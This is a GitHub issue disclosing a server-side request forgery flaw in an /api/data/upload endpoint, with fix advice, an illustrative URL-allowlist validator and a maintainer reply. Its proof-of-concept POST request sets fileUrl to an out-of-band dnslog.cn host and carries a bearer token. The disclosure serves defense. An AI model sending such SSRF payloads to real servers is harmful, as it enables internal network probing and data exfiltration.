SSRF Vulnerability in /api/data/upload #284

Open
shadia0 opened this issue Sep 19, 2024 · 1 comment
shadia0 commented Sep 19, 2024

Describe the bug

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/data/upload path. The vulnerability is triggered through the fileUrl parameter, which allows an attacker to make arbitrary requests to internal or external systems.

To Reproduce
Send a POST request to /api/data/upload with the fileUrl parameter set to a URL under the attacker's control.
Example request:

```http
POST /api/data/upload HTTP/1.1
Host: localhost:8190
Content-Length: 88
sec-ch-ua:
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJCYXNpY0FJIiwiaWF1IjoxNzI2NjU4NTA4LCJleHAiOjE3MjcwOTA2MTcsInN1YiI6IjIifQ.NesghMUWkzzJMiLRDC_g0Tom1m_zVpgD4yS50edvODAHETgxQCT1MQXs4O1YXhmWIaz6LHY7BZo-K94GXnlotg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
ignoreCancelToken: true
sec-ch-ua-platform: ""
Origin: http://localhost:8190
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8190/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"fileUrl":"http://fykbyi.dnslog.cn","datasetId":"5","source":"URL","dataFormat":"COCO"}
```


After sending the request, a DNS request is received on dnslog.cn, confirming that the server made a request to the attacker's controlled domain. This demonstrates that an attacker can craft a malicious HTTP request to trick the application into making requests to arbitrary systems and exfiltrating information to an attacker's external domain.


Affected Version
This vulnerability affects the latest version: v0.9.1

Fix Recommendations
- Input Validation: Implement strict validation on the fileUrl parameter to ensure only allowed domains are processed.
- Whitelist Approach: Use a whitelist of allowed URLs or domains that the application can access.
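
As an added illustration of the allowlist recommendation above (example code, not part of the issue report or the project), the check below rejects a `fileUrl` unless its scheme and host are on an explicit allowlist; the host names, function name and the rule that literal IP addresses are never fetched are assumptions made for the example.

```python
from ipaddress import ip_address
from urllib.parse import urlsplit

# Hypothetical allowlist for the example; a deployment would load this from config.
ALLOWED_HOSTS = {"datasets.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"https"}


def is_allowed_file_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if the server may fetch `url` on the caller's behalf.

    Order of checks: parseable URL, allowed scheme, no credentials in the
    authority part (blocks "allowed.host@evil.host" confusion), a host is
    present, the host is not a literal IP address (so loopback, link-local
    and RFC 1918 targets are never reachable this way), and finally an
    exact, case-insensitive match against the allowlist.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname
    if not host:
        return False
    host = host.lower().rstrip(".")  # normalise case and trailing dot
    try:
        ip_address(host)  # urlsplit strips the [] around IPv6 literals
        return False      # literal IPs are never acceptable dataset sources
    except ValueError:
        pass
    return host in {h.lower() for h in allowed_hosts}


if __name__ == "__main__":
    # The attacker-controlled host from the report must be rejected.
    print(is_allowed_file_url("http://fykbyi.dnslog.cn"))          # False
    print(is_allowed_file_url("https://datasets.example.com/a.zip"))  # True
```

A hostname allowlist only governs the first request: the code that performs the download should also refuse to follow redirects (or re-run this check on every hop) and should reject responses from addresses outside the expected range after DNS resolution.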

jaggerwang (Contributor) commented:
Thanks for your feedback, we will fix it later, or you can fix it by submitting a PR.

@jaggerwang jaggerwang assigned fanyinbo and unassigned jaggerwang Sep 27, 2024